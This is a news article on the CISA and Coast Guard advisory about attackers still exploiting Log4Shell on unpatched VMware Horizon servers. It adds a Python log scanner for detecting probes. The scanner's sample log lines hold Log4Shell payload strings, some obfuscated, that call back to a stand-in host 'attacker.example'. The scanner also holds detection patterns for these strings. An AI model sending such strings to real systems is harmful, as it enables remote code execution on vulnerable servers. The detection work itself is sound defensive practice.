Six months after a fix was released, hackers are still exploiting the infamous Log4Shell vulnerability against VMware Horizon and Unified Access Gateway servers to gain initial access to victims' networks.
According to a recent joint advisory published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Coast Guard Cyber Command (CGCYBER), since December 2021 multiple threat actor groups, including state-sponsored ones, have been exploiting Log4Shell on unpatched, public-facing VMware Horizon and Unified Access Gateway servers. In these attacks, threat actors were observed planting malware on compromised systems, with embedded executables that enabled remote command-and-control.
The Log4Shell vulnerability (CVE-2021-44228) is a remote code execution flaw in the widely used Apache Log4j logging library. Using this bug, a threat actor can send a specially crafted command to an affected system, execute malicious code, and take control of the victim's machine.
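As an added illustration (not code from the advisory or the original article), the following Python snippet shows the kind of log check a defender can run to spot Log4Shell probing: the flaw fires when attacker-controlled text containing a `${jndi:...}` lookup is logged by a vulnerable Log4j instance, so access logs that record request paths and User-Agent headers are a natural place to look. The sample log lines and the `attacker.example` hostname are constructed, and the function names are my own; the `${lower:x}`, `${upper:x}` and `${::-x}` wrappers it collapses are real Log4j lookup syntax that evaluates to the literal `x`, which is why a detector should normalize them before matching.

```python
import re

# Constructed sample access-log lines (not real traffic). The first three
# carry a JNDI lookup string in the User-Agent or the request path, the
# last two are benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [12/Jun/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - [12/Jun/2022:10:01:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:rmi://attacker.example/b}"',
    '10.0.0.7 - - [12/Jun/2022:10:01:04 +0000] '
    '"GET /?x=${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/c} HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    '10.0.0.8 - - [12/Jun/2022:10:01:05 +0000] "GET /portal/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Jun/2022:10:01:06 +0000] "GET /static/app.js HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]

# Innermost Log4j lookups of the forms ${lower:x}, ${upper:x} and ${::-x}
# (empty key with default value x). Each evaluates to the literal x, so
# resolving them first lets one pattern catch padded variants of a payload.
_LOOKUP_RE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{::-([^${}]*)\}", re.IGNORECASE)

# The lookup that actually triggers CVE-2021-44228 once normalized.
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Scheme and host of the callback target, useful as a blocklist indicator.
_TARGET_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/:}\s]+)", re.IGNORECASE)


def normalize(text: str) -> str:
    """Collapse simple nested lookups to their literal values until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _LOOKUP_RE.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup after normalization."""
    return bool(_JNDI_RE.search(normalize(line)))


def extract_indicator(line: str):
    """Return (scheme, host) of the JNDI callback target, or None if absent."""
    m = _TARGET_RE.search(normalize(line))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan(lines):
    """Return (line_number, scheme, host) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        if is_log4shell_probe(line):
            scheme, host = extract_indicator(line) or (None, None)
            hits.append((n, scheme, host))
    return hits


if __name__ == "__main__":
    for n, scheme, host in scan(SAMPLE_LOG_LINES):
        print(f"line {n}: JNDI lookup via {scheme} to {host}")
```

Run it against real access logs by replacing `SAMPLE_LOG_LINES` with lines read from the log file. A hit is a signal that a host is being probed, not proof of compromise; it should drive triage (was the server patched, does it show outbound connections to the extracted host) rather than replace patching, which remains the only real fix.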
According to the joint advisory, the hackers use Log4Shell to deliver malicious payloads, including PowerShell scripts and hmsvc.exe, a remote access tool capable of keylogging and deploying additional malware.
The Log4Shell vulnerability was identified in November 2021 and patched a month later, three days before it was publicly disclosed. But the ongoing Log4Shell-related malicious campaign suggests that many servers remain unpatched and that the vulnerability remains a very valuable asset for hackers, especially advanced persistent threat (APT) groups.